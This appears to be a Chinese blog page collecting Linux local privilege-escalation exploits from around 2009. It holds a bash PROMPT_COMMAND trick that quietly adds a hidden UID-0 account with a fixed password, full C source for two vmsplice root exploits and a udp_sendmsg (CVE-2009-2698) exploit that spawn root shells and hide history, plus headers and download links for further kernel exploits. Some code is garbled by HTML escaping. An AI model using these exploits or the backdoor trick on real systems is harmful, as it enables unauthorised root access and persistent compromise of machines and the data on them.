暖月 » linux漏洞

linux的BASH提权

Tue, 22 Dec 2009 11:26:48 +0000

要利用成功的话，还得看管理员的习惯，是否喜欢用su切换成root
BASH的环境变量
$PROMPT_COMMAND
这个变量保存了在主提示符$PS1显示之前需要执行的命令:

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

Linux Kernel 2.6.23 – 2.6.24 vmsplice Local Root Exploit

Wed, 02 Sep 2009 15:09:48 +0000

/*
 * diane_lane_fucked_hard.c
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.23 - 2.6.24
 */
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
 
#define TARGET_PATTERN		" sys_vm86old"
#define TARGET_SYSCALL		113
 
#ifndef __NR_vmsplice
#define __NR_vmsplice		316
#endif
 
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot()		syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
 
#define TRAMP_CODE		(void *) trampoline	
#define TRAMP_SIZE		( sizeof(trampoline) - 1 )
 
unsigned char trampoline[] =
"\x8b\x5c\x24\x04"		/* mov    0x4(%esp),%ebx	*/
"\x8b\x4c\x24\x08"		/* mov    0x8(%esp),%ecx	*/
"\x81\xfb\x69\x7a\x00\x00"	/* cmp    $31337,%ebx		*/
"\x75\x02"			/* jne    +2			*/
"\xff\xd1"			/* call   *%ecx			*/
"\xb8\xea\xff\xff\xff"		/* mov    $-EINVAL,%eax		*/
"\xc3"				/* ret				*/
;
 
void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}
 
long	get_target()
{
	FILE	*f;
	long	addr = 0;
	char	line[128];
 
	f = fopen("/proc/kallsyms", "r");
	if (!f) die("/proc/kallsyms", errno);
 
	while (fgets(line, sizeof(line), f)) {
		if (strstr(line, TARGET_PATTERN)) {
			addr = strtoul(line, NULL, 16);
			break;
		}
	}
 
	fclose(f);
	return addr;
}
 
static inline __attribute__((always_inline))
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}
 
static uint uid, gid;
 
void	kernel_code()
{
	int	i;
	uint	*p = get_current();
 
	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	
}
 
int	main(int argc, char *argv[])
{
	int		pi[2];
	long		addr;
	struct iovec	iov;
 
	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);
 
	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");
 
	if (!uid || !gid)
		die("!@#$", 0);
 
	addr = get_target();
	printf("[+] addr: 0x%lx\n", addr);
 
	if (pipe(pi) < 0)
		die("pipe", errno);
 
	iov.iov_base = (void *) addr;
	iov.iov_len  = TRAMP_SIZE;
 
	write(pi[1], TRAMP_CODE, TRAMP_SIZE);
	_vmsplice(pi[0], &iov, 1, 0);
 
	gimmeroot();
 
	if (getuid() != 0)
		die("wtf", 0);
 
	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
	return 0;
}
 
// milw0rm.com [2008-02-09]

Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit

Wed, 02 Sep 2009 15:08:16 +0000

/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include
 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 
 
#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)
 
struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};
 
void	exit_code();
char	exit_stack[1024 * 1024];
 
void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}
 
#if defined (__i386__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif
 
#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246
 
static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
 
static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}
 
#elif defined (__x86_64__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif
 
#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246
 
static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
 
static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}
 
#else
#error "unsupported arch"
#endif
 
#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)
 
#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
 
static uint uid, gid;
 
void	kernel_code()
{
	int	i;
	uint	*p = get_current();
 
	for (i = 0; i &lt; 1024-13; i++) { 		if (p[0] == uid &amp;&amp; p[1] == uid &amp;&amp; 		    p[2] == uid &amp;&amp; p[3] == uid &amp;&amp; 		    p[4] == gid &amp;&amp; p[5] == gid &amp;&amp; 		    p[6] == gid &amp;&amp; p[7] == gid) { 			p[0] = p[1] = p[2] = p[3] = 0; 			p[4] = p[5] = p[6] = p[7] = 0; 			p = (uint *) ((char *)(p + 8) + sizeof(void *)); 			p[0] = p[1] = p[2] = ~0; 			break; 		} 		p++; 	}	 	exit_kernel(); } void	exit_code() { 	if (getuid() != 0) 		die("wtf", 0); 	printf("[+] root\n"); 	putenv("HISTFILE=/dev/null"); 	execl("/bin/bash", "bash", "-i", NULL); 	die("/bin/bash", errno); } int	main(int argc, char *argv[]) { 	int		pi[2]; 	size_t		map_size; 	char *		map_addr; 	struct iovec	iov; 	struct page *	pages[5]; 	uid = getuid(); 	gid = getgid(); 	setresuid(uid, uid, uid); 	setresgid(gid, gid, gid); 	printf("-----------------------------------\n"); 	printf(" Linux vmsplice Local Root Exploit\n"); 	printf(" By qaaz\n"); 	printf("-----------------------------------\n"); 	if (!uid || !gid) 		die("!@#$", 0); 	/*****/ 	pages[0] = *(void **) &amp;(int[2]){0,PAGE_SIZE}; 	pages[1] = pages[0] + 1; 	map_size = PAGE_SIZE; 	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, 	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 	if (map_addr == MAP_FAILED) 		die("mmap", errno); 	memset(map_addr, 0, map_size); 	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); 	printf("[+] page: 0x%lx\n", pages[0]); 	printf("[+] page: 0x%lx\n", pages[1]); 	pages[0]-&gt;flags    = 1 &lt;&lt; PG_compound; 	pages[0]-&gt;private  = (unsigned long) pages[0];
	pages[0]-&gt;count    = 1;
	pages[1]-&gt;lru.next = (long) kernel_code;
 
	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;
 
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
 
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);
 
	pages[2]-&gt;flags    = 1 &lt;&lt; PG_compound; 	pages[2]-&gt;private  = (unsigned long) pages[2];
	pages[2]-&gt;count    = 1;
	pages[3]-&gt;lru.next = (long) kernel_code;
 
	/*****/
	pages[4] = *(void **) &amp;(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);
 
	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
 
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 
	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) &lt; 0)
		die("munmap", errno);
 
	/*****/
	if (pipe(pi) &lt; 0) die("pipe", errno);
	close(pi[0]);
 
	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;
 
	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &amp;iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}
 
// milw0rm.com [2008-02-09]

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

Wed, 02 Sep 2009 14:58:30 +0000

/* dedicated to my best friend in the whole world, Robin Price
   the joke is in your hands

   just too easy -- some nice library functions for reuse here though

   credits to julien tinnes/tavis ormandy for the bug

   may want to remove the __attribute__((regparm(3))) for 2.4 kernels,
   I have no time to test

spender@www:~$ cat redhat_hehe
I bet Red Hat will wish they closed the SELinux vulnerability when they
were given the opportunity to.  Now all RHEL boxes will get owned by
leeches.c :p

fd7810e34e9856f77cba67f291ba115f33411ebd
d4b0e413ebf15d039953dfabf7f9a2d1

thanks to Dan Walsh for the great SELinux bypass even on "fixed" SELinux
policies

and nice work Linus on trying to silently fix an 8 year old
vulnerability, leaving vendors without patched kernels for their users.

  use ./wunderbar_emporium.sh for everything

don't have mplayer? watch an earlier version of the exploit at:

http://www.youtube.com/watch?v=arAfIp7YzZ4

*/

http://www.grsecurity.net/~spender/wunderbar_emporium.tgz

back: 2009-wunderbar_emporium

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)

Wed, 02 Sep 2009 14:51:35 +0000

/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful
use ./therebel.sh for everything

At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/
back: 2009-therebel

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (debian/etch)

/***********************************************************
 * hoagie_udp_sendmsg.c
 * LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
 *
 * udp_sendmsg bug exploit via (*output) callback function
 * used in dst_entry / rtable
 *
 * Bug reported by Tavis Ormandy and Julien Tinnes
 * of the Google Security Team
 *
 * Tested with Debian Etch (r0)
 *
 * $ cat /etc/debian_version
 * 4.0
 * $ uname -a
 * Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
 * $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
 * $ ./hoagie_udp_sendmsg
 * hoagie_udp_sendmsg.c - linux root < 2.6.19 local
 * -andi / void.at
 *
 * sh-3.1# id
 * uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
 * sh-3.1#
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * andi@void.at
 * http://www.void.at
 *
 ************************************************************/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
/**
 * this code will be called from NF_HOOK via (*output) callback in kernel mode
 */
void set_current_task_uids_gids_to_zero() {
   asm("push %eax\n"
       "movl $0xffffe000, %eax\n"
       "andl %esp, %eax\n"
       "movl (%eax), %eax\n"
       "movl $0x0, 0x150(%eax)\n"
       "movl $0x0, 0x154(%eax)\n"
       "movl $0x0, 0x158(%eax)\n"
       "movl $0x0, 0x15a(%eax)\n"
       "movl $0x0, 0x160(%eax)\n"
       "movl $0x0, 0x164(%eax)\n"
       "movl $0x0, 0x168(%eax)\n"
       "movl $0x0, 0x16a(%eax)\n"
       "pop  %eax\n");
}
 
int main(int argc, char **argv) {
   int s;
   struct msghdr header;
   struct sockaddr_in sin;
   char *rtable = NULL;
 
   fprintf(stderr,
           "hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n" 	              "-andi / void.at\n\n");    s = socket(PF_INET, SOCK_DGRAM, 0);    if (s == -1) {       fprintf(stderr, "[*] can't create socket\n");       exit(-1);    }    /**     * initialize required variables     */    memset(&amp;header, 0, sizeof(struct msghdr));    memset(&amp;sin, 0, sizeof(struct sockaddr_in));    sin.sin_family = AF_INET;    sin.sin_addr.s_addr = inet_addr("127.0.0.1");    sin.sin_port = htons(22);    header.msg_name = &amp;sin;    header.msg_namelen = sizeof(sin);    /**     * and this is the trick:     * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
    * so we map our rtable buffer at offset 0 and set output callback function
    *
    * struct dst_entry
    * {
    *         struct dst_entry        *next;
    *         atomic_t                __refcnt;       client references
    *         int                     __use;
    *         struct dst_entry        *child;
    *         struct net_device       *dev;
    *         short                   error;
    *         short                   obsolete;
    *         int                     flags;
    * #define DST_HOST                1
    * #define DST_NOXFRM              2
    * #define DST_NOPOLICY            4
    * #define DST_NOHASH              8
    * #define DST_BALANCED            0x10
    *         unsigned long           lastuse;
    *         unsigned long           expires;
    *
    *         unsigned short          header_len;     * more space at head required *
    *         unsigned short          trailer_len;    * space to reserve at tail *
    *
    *         u32                     metrics[RTAX_MAX];
    *         struct dst_entry        *path;
    *
    *         unsigned long           rate_last;      * rate limiting for ICMP *
    *         unsigned long           rate_tokens;
    *
    *         struct neighbour        *neighbour;
    *         struct hh_cache         *hh;
    *         struct xfrm_state       *xfrm;
    *
    *         int                     (*input)(struct sk_buff*);
    *         int                     (*output)(struct sk_buff*);
    *
    * #ifdef CONFIG_NET_CLS_ROUTE
    *         __u32                   tclassid;
    * #endif
    *
    *         struct  dst_ops         *ops;
    *         struct rcu_head         rcu_head;
    *
    *         char                    info[0];
    * };
    *
    * struct rtable
    * {
    *         union
    *         {
    *                 struct dst_entry        dst;
    *                 struct rtable           *rt_next;
    *         } u;
    *
    *         struct in_device        *idev;
    *
    *         unsigned                rt_flags;
    *         __u16                   rt_type;
    *         __u16                   rt_multipath_alg;
    *
    *         __be32                  rt_dst; * Path destination     *
    *         __be32                  rt_src; * Path source          *
    *         int                     rt_iif;
    *
    *         * Info on neighbour *
    *         __be32                  rt_gateway;
    *
    *         * Cache lookup keys *
    *         struct flowi            fl;
    *
    *         * Miscellaneous cached information *
    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
    *         struct inet_peer        *peer; * long-living peer info *
    * };
    *
    */
   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
   if (rtable == MAP_FAILED) {
      fprintf(stderr, "[*] mmap failed\n");
      exit(-1);
   }
   *(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;
 
   /* trigger exploit
    *
    * the second sendmsg() call will call ip_append_data() with rt == NULL
    * because of:
    * if (up->pending) {
    *          *
    *          * There are pending frames.
    *          * The socket lock must be held while it's corked.
    *          *
    *          lock_sock(sk);
    *          if (likely(up->pending)) {
    *                    if (unlikely(up->pending != AF_INET)) {
    *                            release_sock(sk);
    *                            return -EINVAL;
    *                    }
    *                    goto do_append_data;
    *            }
    *            release_sock(sk);
    *    }
    *
    */
   sendmsg(s, &amp;header, MSG_MORE|MSG_PROXY);
   sendmsg(s, &amp;header, 0);
 
   close(s);
 
   system("/bin/sh");
 
   return 0;
}
 
// milw0rm.com [2009-09-02]